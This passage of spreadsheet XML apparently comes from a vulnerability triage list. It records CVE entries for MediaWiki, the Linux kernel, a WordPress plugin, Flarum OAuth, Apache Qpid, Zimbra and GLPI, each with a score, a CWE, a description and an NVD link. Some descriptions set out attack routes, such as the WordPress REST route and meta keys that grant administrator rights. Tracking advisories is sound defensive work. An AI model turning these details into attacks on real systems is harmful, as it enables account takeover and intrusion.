    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T729" r:id="rId728"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T730" r:id="rId729"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T731" r:id="rId730"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T732" r:id="rId731"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T733" r:id="rId732"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T734" r:id="rId733"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T735" r:id="rId734"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T736" r:id="rId735"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T737" r:id="rId736"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T738" r:id="rId737"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T739" r:id="rId738"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T740" r:id="rId739"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T741" r:id="rId740"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T742" r:id="rId741"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T743" r:id="rId742"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T744" r:id="rId743"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T745" r:id="rId744"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T746" r:id="rId745"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T747" r:id="rId746"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T748" r:id="rId747"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T749" r:id="rId748"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T750" r:id="rId749"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T751" r:id="rId750"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T752" r:id="rId751"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T753" r:id="rId752"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T754" r:id="rId753"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T755" r:id="rId754"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T756" r:id="rId755"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T757" r:id="rId756"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T758" r:id="rId757"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T759" r:id="rId758"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T760" r:id="rId759"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T761" r:id="rId760"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T762" r:id="rId761"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T763" r:id="rId762"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T764" r:id="rId763"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T765" r:id="rId764"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T766" r:id="rId765"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T767" r:id="rId766"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T768" r:id="rId767"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T769" r:id="rId768"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T770" r:id="rId769"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T771" r:id="rId770"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T772" r:id="rId771"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T773" r:id="rId772"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T774" r:id="rId773"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T775" r:id="rId774"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T776" r:id="rId775"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T777" r:id="rId776"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T778" r:id="rId777"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T779" r:id="rId778"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T780" r:id="rId779"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T781" r:id="rId780"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T782" r:id="rId781"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T783" r:id="rId782"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T784" r:id="rId783"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T785" r:id="rId784"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T786" r:id="rId785"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T787" r:id="rId786"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T788" r:id="rId787"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T789" r:id="rId788"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T790" r:id="rId789"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T791" r:id="rId790"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T792" r:id="rId791"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T793" r:id="rId792"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T794" r:id="rId793"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T795" r:id="rId794"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T796" r:id="rId795"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T797" r:id="rId796"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T798" r:id="rId797"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T799" r:id="rId798"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T800" r:id="rId799"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T801" r:id="rId800"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T802" r:id="rId801"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T803" r:id="rId802"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T804" r:id="rId803"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T805" r:id="rId804"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T806" r:id="rId805"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T807" r:id="rId806"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T808" r:id="rId807"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T809" r:id="rId808"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T810" r:id="rId809"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T811" r:id="rId810"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T812" r:id="rId811"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T813" r:id="rId812"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T814" r:id="rId813"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T815" r:id="rId814"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T816" r:id="rId815"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T817" r:id="rId816"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T818" r:id="rId817"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T819" r:id="rId8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8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CVE-2026-100382</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Wikimedia Foundation Mediawiki - ExternalData Extension allows OS Command Injection.
This issue affects Mediawiki - ExternalData Extension: from * before 3.7.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100382</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100075</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/srpt: Fix srpt_alloc_rw_ctxs() unwind counters
When srpt_alloc_rw_ctxs() fails partway through a multi-buffer indirect
descriptor, the unwind path destroys RDMA contexts but leaves stale
n_rw_ctx and n_rdma values (and a dangling rw_ctxs pointer). Later
sq_wr_avail accounting in srpt_queue_response() or srpt_write_pending()
can then subtract the wrong number of send queue credits.
Reset the counters and clear rw_ctxs after freeing the heap
allocation before returning an error.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100075</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14281</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>The Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.8.6. This is due to missing permission enforcement on the publicly accessible REST route `POST /wp-json/wawp/v1/signup/&lt;op&gt;` and the absence of a key allowlist in the `finish_registration_logic` function, which copies the attacker-controlled `wawp_custom_fields` parameter directly into `update_user_meta()` — allowing sensitive meta keys such as `wp_capabilities` and `wp_user_level` to be set by the caller. This makes it possible for unauthenticated attackers to register a new account with the administrator role and gain full administrative access to the site. When OTP verification is enabled at signup, the OTP session token (`otp_transient`) is returned in plaintext in the HTTP response body, and the `handle_magic_link_request()` handler marks that token as verified on any unauthenticated GET request containing it without ever checking the OTP code value — making the OTP step trivially bypassable with no inbox or SMS access required.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14281</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92161</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>composer:fof/oauth</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.7.4, 2.0.0-beta.4</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>FriendsOfFlarum OAuth allows users to log in to Flarum with GitHub, Twitter, Facebook, and other providers. Prior to 1.7.4 and 2.0.0-beta.4, the Discord OAuth provider does not check the verified field returned for an OAuth email before passing the address to Flarum core as trusted through provideTrustedEmail(). When Discord sign-in is enabled, an unauthenticated attacker who knows the email address of a Flarum user can configure a Discord account with that unverified address and a verified phone number, then sign in to cause Flarum to match the trusted address, link the attacker-controlled Discord identity to the existing user, and authenticate as the victim without a password or victim interaction. Exploitation requires that the victim's email address is not already associated with a Discord account, and it can compromise administrator accounts. Other bundled providers were not confirmed to be practically exploitable by this method because their relevant authentication flows return only verified or confirmed email addresses. This issue is fixed in versions 1.7.4 and 2.0.0-beta.4.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92161</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92609</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Session fixation in HTTP management authentication allows remote attackers to gain unauthorized access to an authenticated management session via reuse of a session identifier retained across successful authentication.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92609</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93643</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-863</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>When OnlyOffice/Document Editing is available, an unauthenticated remote attacker with access to an existing supported public Briefcase document can abuse unsigned save fields to perform path-traversal writes and execute commands as zimbra.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93643</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48482</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, a form administrator can use Form import with a crafted illustration or scene identifier that traverses outside the intended custom-asset directory. The imported file can be written to an executable server location, allowing a malicious script to be invoked remotely. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48482</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93641</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Classic recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93641</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93642</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Modern recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93642</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93647</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated calendar sender can place active markup in a COUNTER message's RFC From address. Selecting the message in Zimbra Classic triggers stored XSS, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93647</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
